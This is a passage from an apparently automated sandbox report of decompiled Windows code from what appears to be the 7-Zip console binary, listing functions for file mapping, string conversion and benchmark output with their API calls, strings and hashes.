				 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
				return _t90;
			}

0x00410dff
0x00410e0c
0x00410e0f
0x00410e11
0x00410e19
0x00410e1e
0x00410e22
0x00410e24
0x00410e24
0x00410e30
0x00410e3d
0x00410e40
0x00410e4b
0x00410e4f
0x00410e54
0x00410e58
0x00410e5a
0x00410e5a
0x00410e67
0x00410e75
0x00410e79
0x00410e83
0x00410e8c
0x00410e8e
0x00410e91
0x00410e94
0x00410e9a
0x00410ea8
0x00410eb0
0x00410eb3
0x00410eb9
0x00410eb5
0x00410eb5
0x00410eb5
0x00410ec4
0x00410ec8
0x00410ed1
0x00410ed8
0x00410ed8
0x00410eeb
0x00410eef
0x00410ef2
0x00410ef9
0x00410ef9
0x00410f01
0x00410f05
0x00410f0c
0x00410f0c
0x00410f18
0x00410f1b
0x00410f1e
0x00410f21
0x00410f24
0x00410f2b
0x00410f2f
0x00410f30
0x00410f35
0x00410f3c
0x00410f5e
0x00410f3e
0x00410f44
0x00410f4a
0x00410f52
0x00410f55
0x00410f55
0x00410f63
0x00410f63
0x00410f66
0x00410f69
0x00410f70
0x00410f70
0x00410f78
0x00410f7e
0x00410f86
0x00410f8c
0x00410f8f
0x00410f94
0x00410f94
0x00410f9a
0x00410fa3
0x00410fb1
0x00410fb7
0x00410fb9
0x00410fbc
0x00410fc8
0x00410fbe
0x00410fbe
0x00410fbe
0x00410fcd
0x00410fd2
0x00410fd5
0x00410fda
0x00410fda
0x00410fe2
0x00410fea
0x00410ff2
0x00410ffa
0x00411002
0x0041100d
0x00411018

APIs

__EH_prolog.LIBCMT ref: 00410DFF
OpenFileMappingA.KERNEL32 ref: 00410EA8
GetLastError.KERNEL32 ref: 00410EB9
MapViewOfFile.KERNEL32(00000002,00000004,00000000,00000000,00000000,?), ref: 00410EE5
UnmapViewOfFile.KERNEL32(00000000,00000003), ref: 00410F86
CloseHandle.KERNEL32(00000002), ref: 00410F94
OpenEventA.KERNEL32(00000002,00000000,00000000), ref: 00410FB1
GetLastError.KERNEL32 ref: 00410FC2

Strings

MapViewOfFile error, xrefs: 00410EF4
data error, xrefs: 00410F6B
Incorrect mapping data, xrefs: 00410F07
Can not open mapping, xrefs: 00410ED3

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: File$ErrorLastOpenView$CloseEventH_prologHandleMappingUnmap
String ID: Can not open mapping$Incorrect mapping data$MapViewOfFile error$data error
API String ID: 3506968402-3547812707
Opcode ID: 536fedebb275c513b52617318d66a2509922886c477389a5a80e1095ca8b336e
Instruction ID: 429b42cc52d2415495e97970ec32bea979b2661ba41aff62b748449d2bc5275c
Opcode Fuzzy Hash: 536fedebb275c513b52617318d66a2509922886c477389a5a80e1095ca8b336e
Instruction Fuzzy Hash: 4E618C30D01219AEDB11EFA6D882AEDBB75EF44308F10443EF505B7291DB781E85DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00472126 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00472126(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, char _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x47cd28);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x4938a0; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0047234A(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x4938a0; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x493880; // 0x0
								_a28 = _t82;
							}
							_t16 =  &_a32; // 0x496224
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~( *_t16) & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E0046CC80(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E0046CC80(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x47cd24, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x47cd20, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x4938a0 = 2;
							goto L5;
						}
					} else {
						 *0x4938a0 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

0x00472129
0x0047212b
0x00472130
0x0047213b
0x0047213c
0x00472143
0x00472149
0x0047214e
0x00472154
0x0047219c
0x0047219f
0x004721a7
0x004721ad
0x004721ae
0x004721ae
0x004721b1
0x004721b9
0x004721db
0x00000000
0x004721e1
0x004721e4
0x004721e6
0x004721eb
0x004721eb
0x004721f6
0x004721fb
0x0047220b
0x0047220d
0x00472212
0x00000000
0x00472218
0x00472218
0x00472223
0x00472228
0x0047222d
0x00472230
0x0047224c
0x00000000
0x00472267
0x00472279
0x0047227b
0x00472280
0x00000000
0x00472282
0x00472286
0x004722c8
0x004722d7
0x004722dc
0x004722df
0x004722e1
0x004722e4
0x004722fe
0x00000000
0x00472318
0x0047231b
0x0047231c
0x0047231d
0x00472323
0x00472326
0x0047231f
0x0047231f
0x00472320
0x00472320
0x00472339
0x0047233d
0x00000000
0x00000000
0x00000000
0x00000000
0x0047233d
0x00472288
0x0047228b
0x00472343
0x00472343
0x00000000
0x00000000
0x00000000
0x0047228b
0x00472286
0x00472280
0x0047224c
0x00472212
0x004721bb
0x004721cd
0x004721cd
0x00472156
0x00472156
0x00472157
0x0047215a
0x00472170
0x0047218c
0x004722b4
0x004722b4
0x00472192
0x00472192
0x00000000
0x00472192
0x00472172
0x00472172
0x00000000
0x00472172
0x00472170
0x004722bc
0x004722c7

APIs

LCMapStringW.KERNEL32(00000000,00000100,0047CD24,00000001,00000000,00000000,747170F0,00496224,?,?,?,00471FC7,?,?,?,00000000), ref: 00472168
LCMapStringA.KERNEL32(00000000,00000100,0047CD20,00000001,00000000,00000000,?,?,00471FC7,?,?,?,00000000,00000001), ref: 00472184
LCMapStringA.KERNEL32(?,?,?,00471FC7,?,?,747170F0,00496224,?,?,?,00471FC7,?,?,?,00000000), ref: 004721CD
MultiByteToWideChar.KERNEL32(?,$bI,?,00471FC7,00000000,00000000,747170F0,00496224,?,?,?,00471FC7,?,?,?,00000000), ref: 00472205
MultiByteToWideChar.KERNEL32(00000000,00000001,?,00471FC7,?,00000000,?,?,00471FC7,?), ref: 0047225D
LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00471FC7,?), ref: 00472273
LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00471FC7,?), ref: 004722A6
LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00471FC7,?), ref: 0047230E

Strings

$bI, xrefs: 004721F6, 00472201

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID: $bI
API String ID: 352835431-2563688255
Opcode ID: 613b29bf82b8a870d737d70060f132928fb253a9dec2a6d6ec0a899db9a9147f
Instruction ID: 5ffb5e9b6ab65bc4ab37f18ce6ac32945fb5d904f638d9a0d25ac77dd211bcbc
Opcode Fuzzy Hash: 613b29bf82b8a870d737d70060f132928fb253a9dec2a6d6ec0a899db9a9147f
Instruction Fuzzy Hash: F051A031500249EFCF228F94CD85AEF7FB5FB49754F20816AF918A1260D3798D60DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401679 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00401679(void* __ecx, signed int __edx, void* __eflags) {
				void* _t56;
				signed int _t63;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				void* _t75;
				void* _t76;
				signed int _t80;
				signed int _t83;
				void* _t85;
				void* _t90;
				void* _t105;
				void* _t111;
				signed int _t114;
				char* _t115;
				intOrPtr _t117;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t124;
				signed int _t126;
				signed int* _t127;
				signed int* _t129;
				signed int _t130;
				signed int* _t131;
				void* _t132;
				void* _t134;
				char** _t135;

				_t114 = __edx;
				E0046B890(E00472CF8, _t132);
				_t135 = _t134 - 0x28;
				 *(_t132 - 0x1c) = __edx;
				_t90 = __ecx;
				if(E00414B6B(__eflags) != 0) {
					_t56 = E0040C609();
					 *(_t132 - 0x28) = _t114;
					_t126 = E0040C5F4();
					_t115 = "size: ";
					_push(_t126);
					_push("CPU hardware threads:");
					E00401631(_t90, _t56,  *(_t132 - 0x28));
					__eflags =  *(_t132 + 8) - 0xffffffff;
					if( *(_t132 + 8) == 0xffffffff) {
						 *(_t132 + 8) = _t126;
					}
					__eflags =  *((intOrPtr*)(_t132 + 0xc)) - 0xffffffff;
					if( *((intOrPtr*)(_t132 + 0xc)) == 0xffffffff) {
						 *((intOrPtr*)(_t132 + 0xc)) = 0x1000000;
					}
					_t120 =  *(_t132 + 8);
					_push(_t120 << 3);
					_t127 = E004079F2();
					 *(_t132 - 0x14) = _t127;
					 *(_t132 - 0x24) = _t127;
					 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
					 *_t135 = "\n\nSize";
					_push(_t90);
					E0046B47B();
					_t63 = 0;
					__eflags = _t120;
					if(_t120 > 0) {
						do {
							_t13 = _t63 + 1; // 0x1
							_t124 = _t13;
							E0046B47B(_t90, " %5d", _t124);
							 *_t127 =  *_t127 & 0x00000000;
							_t127[1] = _t127[1] & 0x00000000;
							_t63 = _t124;
							_t135 =  &(_t135[3]);
							_t127 =  &(_t127[2]);
							__eflags = _t63 -  *(_t132 + 8);
						} while (_t63 <  *(_t132 + 8));
					}
					_push("\n\n");
					_push(_t90);
					E0046B47B();
					__eflags =  *(_t132 - 0x1c);
					 *(_t132 - 0x2c) = 0;
					 *(_t132 - 0x28) = 0;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					if( *(_t132 - 0x1c) <= 0) {
						L23:
						E00407A18( *(_t132 - 0x14));
						_t67 = 0;
						__eflags = 0;
					} else {
						do {
							 *(_t132 - 0x10) = 0xa;
							while(1) {
								_t100 =  *(_t132 - 0x10);
								_t68 = 1;
								_t69 = _t68 <<  *(_t132 - 0x10);
								__eflags = _t69 -  *((intOrPtr*)(_t132 + 0xc));
								 *(_t132 - 0x20) = _t69;
								if(_t69 >  *((intOrPtr*)(_t132 + 0xc))) {
									goto L17;
								}
								E0046B47B(_t90, "%2d: ", _t100);
								_t122 = 0;
								_t135 =  &(_t135[3]);
								__eflags =  *(_t132 + 8);
								if( *(_t132 + 8) <= 0) {
									L16:
									_push("\n");
									_push(_t90);
									E0046B47B();
									 *(_t132 - 0x2c) =  *(_t132 - 0x2c) + 1;
									asm("adc dword [ebp-0x28], 0x0");
									 *(_t132 - 0x10) =  *(_t132 - 0x10) + 1;
									__eflags =  *(_t132 - 0x10) - 0x20;
									if( *(_t132 - 0x10) < 0x20) {
										continue;
									} else {
										goto L17;
									}
								} else {
									_t129 =  *(_t132 - 0x14);
									while(1) {
										_t80 = E00401896();
										__eflags = _t80;
										if(_t80 != 0) {
											break;
										}
										_t122 = _t122 + 1;
										_push(_t132 - 0x34);
										_t83 = E00414C98(_t122,  *(_t132 - 0x20));
										__eflags = _t83;
										if(_t83 != 0) {
											_t130 = _t83;
											L27:
											E00407A18( *(_t132 - 0x14));
											_t67 = _t130;
										} else {
											_t117 =  *((intOrPtr*)(_t132 - 0x30));
											_t111 = 0x14;
											_t85 = E0046B2E0( *((intOrPtr*)(_t132 - 0x34)), _t111, _t117);
											_push(_t117);
											_push(_t85);
											_t115 = 5;
											E00401134(_t90, _t115, __eflags);
											 *_t129 =  *_t129 +  *((intOrPtr*)(_t132 - 0x34));
											asm("adc [esi+0x4], ecx");
											_t129 =  &(_t129[2]);
											__eflags = _t122 -  *(_t132 + 8);
											if(_t122 <  *(_t132 + 8)) {
												continue;
											} else {
												goto L16;
											}
										}
										goto L24;
									}
									_t130 = 0x80004004;
									goto L27;
								}
								goto L24;
							}
							L17:
							 *((intOrPtr*)(_t132 - 0x18)) =  *((intOrPtr*)(_t132 - 0x18)) + 1;
							__eflags =  *((intOrPtr*)(_t132 - 0x18)) -  *(_t132 - 0x1c);
						} while ( *((intOrPtr*)(_t132 - 0x18)) <  *(_t132 - 0x1c));
						__eflags =  *(_t132 - 0x2c) |  *(_t132 - 0x28);
						if(( *(_t132 - 0x2c) |  *(_t132 - 0x28)) != 0) {
							_push("\nAvg:");
							_push(_t90);
							E0046B47B();
							_t123 =  *(_t132 + 8);
							__eflags = _t123;
							if(_t123 > 0) {
								_t131 =  *(_t132 - 0x14);
								do {
									_t75 = E0046B300( *_t131, _t131[1],  *(_t132 - 0x2c),  *(_t132 - 0x28));
									_t105 = 0x14;
									_t76 = E0046B2E0(_t75, _t105, _t115);
									_push(_t115);
									_push(_t76);
									_t115 = 5;
									E00401134(_t90, _t115, __eflags);
									_t131 =  &(_t131[2]);
									_t123 = _t123 - 1;
									__eflags = _t123;
								} while (_t123 != 0);
							}
							_push("\n");
							_push(_t90);
							E0046B47B();
						}
						goto L23;
					}
				} else {
					_t67 = 1;
				}
				L24:
				 *[fs:0x0] =  *((intOrPtr*)(_t132 - 0xc));
				return _t67;
			}

0x00401679
0x0040167e
0x00401683
0x00401689
0x0040168c
0x00401695
0x0040169f
0x004016a6
0x004016ae
0x004016b0
0x004016b5
0x004016b6
0x004016c1
0x004016c6
0x004016ca
0x004016cc
0x004016cc
0x004016cf
0x004016d3
0x004016d5
0x004016d5
0x004016dc
0x004016e4
0x004016ea
0x004016ec
0x004016ef
0x004016f2
0x004016f6
0x004016fd
0x004016fe
0x00401704
0x00401706
0x00401709
0x0040170b
0x0040170b
0x0040170b
0x00401715
0x0040171a
0x0040171d
0x00401721
0x00401723
0x00401726
0x00401729
0x00401729
0x0040170b
0x0040172e
0x00401733
0x00401734
0x0040173c
0x00401740
0x00401743
0x00401746
0x00401749
0x0040185b
0x0040185e
0x00401864
0x00401864
0x0040174f
0x0040174f
0x0040174f
0x00401756
0x00401756
0x0040175b
0x0040175c
0x0040175e
0x00401761
0x00401764
0x00000000
0x00000000
0x00401771
0x00401776
0x00401778
0x0040177b
0x0040177e
0x004017d4
0x004017d4
0x004017d9
0x004017da
0x004017df
0x004017e5
0x004017e9
0x004017ec
0x004017f0
0x00000000
0x00000000
0x00000000
0x00000000
0x00401780
0x00401780
0x00401783
0x00401783
0x00401788
0x0040178a
0x00000000
0x00000000
0x00401793
0x00401799
0x0040179a
0x0040179f
0x004017a1
0x0040187e
0x00401880
0x00401883
0x00401889
0x004017a7
0x004017aa
0x004017af
0x004017b0
0x004017b7
0x004017b8
0x004017bb
0x004017bc
0x004017c7
0x004017c9
0x004017cc
0x004017cf
0x004017d2
0x00000000
0x00000000
0x00000000
0x00000000
0x004017d2
0x00000000
0x004017a1
0x00401877
0x00000000
0x00401877
0x00000000
0x0040177e
0x004017f6
0x004017f6
0x004017fc
0x004017fc
0x00401808
0x0040180b
0x0040180d
0x00401812
0x00401813
0x00401818
0x0040181c
0x0040181f
0x00401821
0x00401824
0x0040182f
0x00401836
0x00401837
0x0040183e
0x0040183f
0x00401842
0x00401843
0x00401848
0x0040184b
0x0040184b
0x0040184b
0x00401824
0x0040184e
0x00401853
0x00401854
0x0040185a
0x00000000
0x0040180b
0x00401697
0x00401699
0x00401699
0x00401866
0x0040186c
0x00401874

APIs

__EH_prolog.LIBCMT ref: 0040167E

Part of subcall function 00414B6B: __EH_prolog.LIBCMT ref: 00414B70

Strings

CPU hardware threads:, xrefs: 004016B6
Avg:, xrefs: 0040180D
%5d, xrefs: 0040170F
, xrefs: 004017EC
size: , xrefs: 004016B0
%2d: , xrefs: 0040176B

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: Avg:$ $ %5d$%2d: $CPU hardware threads:$size:
API String ID: 3519838083-1473790758
Opcode ID: b95e5d18777f8c829bc06347f2ade39e5bb4edbb476a6909730488946cc3f890
Instruction ID: cf4bf7488a743daec15e4d6fa5ec6e5030c6436caeeb10ae79287eb816e5538f
Opcode Fuzzy Hash: b95e5d18777f8c829bc06347f2ade39e5bb4edbb476a6909730488946cc3f890
Instruction Fuzzy Hash: 7851B472D00208ABDB10EF65DC41AAE77B5EF44364F20842FF854B72D1DB7D99818B99

Uniqueness

Uniqueness Score: -1.00%

Function 00414269 Relevance: 12.5, APIs: 8, Instructions: 493
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00414269(unsigned int __ecx, signed int __edx) {
				void* __edi;
				signed int _t241;
				signed int _t242;
				signed int _t247;
				signed int _t249;
				intOrPtr* _t262;
				signed int _t269;
				intOrPtr* _t280;
				signed int _t281;
				intOrPtr* _t289;
				intOrPtr* _t292;
				intOrPtr _t294;
				signed int _t295;
				signed int _t303;
				signed int _t309;
				signed int _t314;
				signed int _t323;
				signed int _t324;
				signed int _t326;
				intOrPtr* _t327;
				unsigned int _t328;
				signed int _t383;
				signed int _t389;
				signed int _t391;
				signed int _t392;
				intOrPtr* _t393;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				void* _t401;
				intOrPtr _t404;
				signed int _t405;
				void* _t408;
				signed int _t409;
				intOrPtr* _t410;
				void* _t411;
				intOrPtr* _t422;

				_t378 = __edx;
				_t328 = __ecx;
				E0046B890(E00474718, _t411);
				_t241 = 1;
				 *(_t411 - 0x2c) = __edx;
				 *((intOrPtr*)(_t411 - 0x8c)) = __ecx;
				if(__ecx <= _t241) {
					_t389 = _t241;
				} else {
					_t389 = __ecx >> 1;
				}
				 *(_t411 - 0x1c) = _t389;
				 *(_t411 - 0x24) = (0 | _t328 - _t241 > 0x00000000) + 1;
				if(_t378 < 0x40000 || _t328 < _t241 || _t389 > 0x10000) {
					_t242 = 0x80070057;
				} else {
					_push(_t389);
					E00414920(_t411 - 0x18);
					_t398 =  *(_t411 - 0x18);
					 *(_t411 - 4) =  *(_t411 - 4) & 0x00000000;
					 *(_t411 - 0x10) =  *(_t411 - 0x10) & 0x00000000;
					_t323 = _t398;
					 *(_t411 - 0x20) = _t323;
					if(_t389 <= 0) {
						L17:
						 *(_t411 - 0x10) =  *(_t411 - 0x10) & 0x00000000;
						 *((intOrPtr*)(_t411 - 0x94)) = 0x159a55e5;
						_t430 = _t389;
						 *((intOrPtr*)(_t411 - 0x90)) = 0x1f123bb5;
						if(_t389 <= 0) {
							L36:
							E00467C60(_t411 - 0x50);
							 *(_t411 - 0x38) =  *(_t411 - 0x38) & 0x00000000;
							 *(_t411 - 0x10) =  *(_t411 - 0x10) & 0x00000000;
							 *(_t411 - 4) = 1;
							 *(_t411 - 0x34) = 1;
							if(_t389 <= 0) {
								L50:
								if(_t389 <= 1 || _t389 <= 0) {
									L54:
									_t399 = 0;
									if( *(_t411 - 0x38) == 0) {
										 *(_t411 - 0x58) = 0;
										E00413688( *((intOrPtr*)(_t323 + 0xc)) + 0x10, _t411 - 0x88);
										__eflags = _t389;
										 *((intOrPtr*)(_t411 - 0x68)) = 0;
										 *((intOrPtr*)(_t411 - 0x64)) = 0;
										 *((intOrPtr*)(_t411 - 0x60)) = 0;
										 *((intOrPtr*)(_t411 - 0x5c)) = 0;
										 *(_t411 - 0x58) = 1;
										if(_t389 <= 0) {
											L59:
											_t247 =  *((intOrPtr*)( *( *(_t411 + 8))))(_t411 - 0x88, 1);
											__eflags = _t247 - _t399;
											 *(_t411 - 0x2c) = _t247;
											if(_t247 == _t399) {
												 *(_t411 - 0x34) =  *(_t411 - 0x34) & 0x00000000;
												_t249 =  *(_t411 - 0x24) * _t389;
												__eflags = _t389 - _t399;
												 *(_t411 - 0x38) = _t399;
												 *(_t411 - 0x14) = _t249;
												 *(_t411 - 0x10) = _t399;
												if(_t389 <= _t399) {
													L78:
													__eflags = _t249 - 1;
													 *(_t411 - 0x14) = _t399;
													if(_t249 <= 1) {
														L94:
														_t400 =  *(_t411 - 0x38);
														__eflags = _t400;
														if(_t400 == 0) {
															E00413688( *((intOrPtr*)(_t323 + 0xc)) + 0x10, _t411 - 0x88);
															_t399 = 0;
															 *((intOrPtr*)(_t411 - 0x68)) = 0;
															 *((intOrPtr*)(_t411 - 0x64)) = 0;
															 *((intOrPtr*)(_t411 - 0x60)) = 0;
															 *((intOrPtr*)(_t411 - 0x5c)) = 0;
															__eflags = _t389;
															 *(_t411 - 0x58) =  *(_t323 + 0x1c) *  *(_t411 - 0x24);
															if(_t389 <= 0) {
																L101:
																_t391 =  *(_t411 + 8);
																_t324 =  *((intOrPtr*)( *_t391 + 4))(_t411 - 0x88, _t399);
																__eflags = _t324 - _t399;
																if(_t324 == _t399) {
																	_t392 =  *((intOrPtr*)( *_t391 + 4))(_t411 - 0x88, 1);
																	__eflags = _t392 - _t399;
																	_push(_t411 - 0x50);
																	if(_t392 == _t399) {
																		DeleteCriticalSection();
																		_t341 =  *(_t411 - 0x18);
																		 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
																		__eflags =  *(_t411 - 0x18) - _t399;
																		if( *(_t411 - 0x18) != _t399) {
																			E0041415B(_t341, _t392, _t411, 3);
																		}
																		_t242 = 0;
																		L113:
																		 *[fs:0x0] =  *((intOrPtr*)(_t411 - 0xc));
																		return _t242;
																	}
																	L106:
																	DeleteCriticalSection();
																	_t342 =  *(_t411 - 0x18);
																	 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
																	if( *(_t411 - 0x18) != _t399) {
																		E0041415B(_t342, _t392, _t411, 3);
																	}
																	_t242 = _t392;
																	goto L113;
																}
																DeleteCriticalSection(_t411 - 0x50);
																_t343 =  *(_t411 - 0x18);
																 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
																__eflags =  *(_t411 - 0x18) - _t399;
																if( *(_t411 - 0x18) != _t399) {
																	E0041415B(_t343, _t391, _t411, 3);
																}
																_t242 = _t324;
																goto L113;
															}
															_t262 = _t323 + 0x68;
															do {
																 *((intOrPtr*)(_t411 - 0x68)) =  *((intOrPtr*)(_t411 - 0x68)) +  *((intOrPtr*)(_t262 - 4));
																asm("adc [ebp-0x64], esi");
																 *((intOrPtr*)(_t411 - 0x60)) =  *((intOrPtr*)(_t411 - 0x60)) +  *_t262;
																asm("adc [ebp-0x5c], esi");
																_t262 = _t262 + 0x84;
																_t389 = _t389 - 1;
																__eflags = _t389;
															} while (_t389 != 0);
															goto L101;
														}
														L95:
														DeleteCriticalSection(_t411 - 0x50);
														_t346 =  *(_t411 - 0x18);
														 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
														__eflags =  *(_t411 - 0x18);
														if( *(_t411 - 0x18) != 0) {
															E0041415B(_t346, _t389, _t411, 3);
														}
														_t242 = _t400;
														goto L113;
													}
													__eflags = _t389;
													if(_t389 <= 0) {
														goto L94;
													}
													 *(_t411 - 0x20) = _t323;
													 *(_t411 - 0x1c) = _t389;
													do {
														__eflags =  *(_t411 - 0x24);
														if( *(_t411 - 0x24) <= 0) {
															goto L86;
														}
														_t401 = 0x4c;
														 *(_t411 - 0x28) =  *(_t411 - 0x24);
														do {
															E00467AC0( *((intOrPtr*)( *(_t411 - 0x20) + _t401 - 0x4c)));
															_t269 =  *( *(_t411 - 0x20) + _t401);
															__eflags = _t269;
															if(_t269 != 0) {
																 *(_t411 - 0x14) = _t269;
															}
															_t401 = _t401 + 4;
															_t185 = _t411 - 0x28;
															 *_t185 =  *(_t411 - 0x28) - 1;
															__eflags =  *_t185;
														} while ( *_t185 != 0);
														L86:
														 *(_t411 - 0x20) =  *(_t411 - 0x20) + 0x84;
														_t189 = _t411 - 0x1c;
														 *_t189 =  *(_t411 - 0x1c) - 1;
														__eflags =  *_t189;
													} while ( *_t189 != 0);
													__eflags =  *(_t411 - 0x14);
													if( *(_t411 - 0x14) == 0) {
														goto L94;
													}
													DeleteCriticalSection(_t411 - 0x50);
													_t348 =  *(_t411 - 0x18);
													 *(_t411 - 4) =  *(_t411 - 4) | 0xffffffff;
													__eflags =  *(_t411 - 0x18);
													if( *(_t411 - 0x18) != 0) {
														E0041415B(_t348, _t389, _t411, 3);
													}
													_t242 =  *(_t411 - 0x14);
													goto L113;
												} else {
													goto L64;
												}
												do {
													L64:
													_t404 =  *(_t411 - 0x10) * 0x84 +  *(_t411 - 0x20);
													_t389 = 0;
													_t383 = 0x4000000 %  *(_t404 + 0x64);
													__eflags =  *(_t411 - 0x10);
													 *((intOrPtr*)(_t404 + 0x1c)) = 0x4000000 /  *(_t404 + 0x64) + 2;
													if( *(_t411 - 0x10) == 0) {
														 *( *((intOrPtr*)(_t404 + 0xc)) + 0x4c) =  *(_t411 + 8);
														 *( *((intOrPtr*)(_t404 + 0xc)) + 0x40) =  *(_t411 - 0x14);
														__eflags =  *((intOrPtr*)(_t404 + 0xc)) + 0x10;
														E00414885( *((intOrPtr*)(_t404 + 0xc)) + 0x10, _t383);
													}
													__eflags =  *(_t411 - 0x14) - 1;
													if( *(_t411 - 0x14) <= 1) {
														_push(_t389);
														_t400 = L00413EF3(_t404);
